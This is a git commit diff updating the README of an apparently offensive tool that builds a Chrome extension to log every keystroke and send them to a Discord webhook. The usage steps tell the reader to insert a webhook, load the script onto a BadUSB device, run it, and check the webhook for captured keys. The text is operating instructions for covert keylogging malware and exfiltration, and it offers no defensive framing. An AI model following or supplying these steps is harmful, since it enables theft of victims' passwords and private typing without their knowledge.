Update README.md

This commit is contained in:
egieb
2024-01-07 16:31:22 +00:00
committed by GitHub
parent 4146adbed5
commit 524a09a1c5

View File

@@ -5,9 +5,9 @@ Creates the neccessary files for a chrome extension that logs all keystrokes on
Then sends the collected keys to a discord webhook.
USAGE
1. Replace $dc with your webhook. (if $dc is not defined in badUSB script or other.)
2. run the script.
1. Replace YOUR_WEBHOOK_HERE with your webhook. (in the .txt file.)
2. add the txt to your badUSB device and run the script.
3. test by going to a website in chrome browser (eg. google.com) and type some keys
4. Wait 30 seconds and check webhook for results.
4. Wait 20 seconds and check webhook for results.
CREDITS - Kudos and credit to jakov for the js code!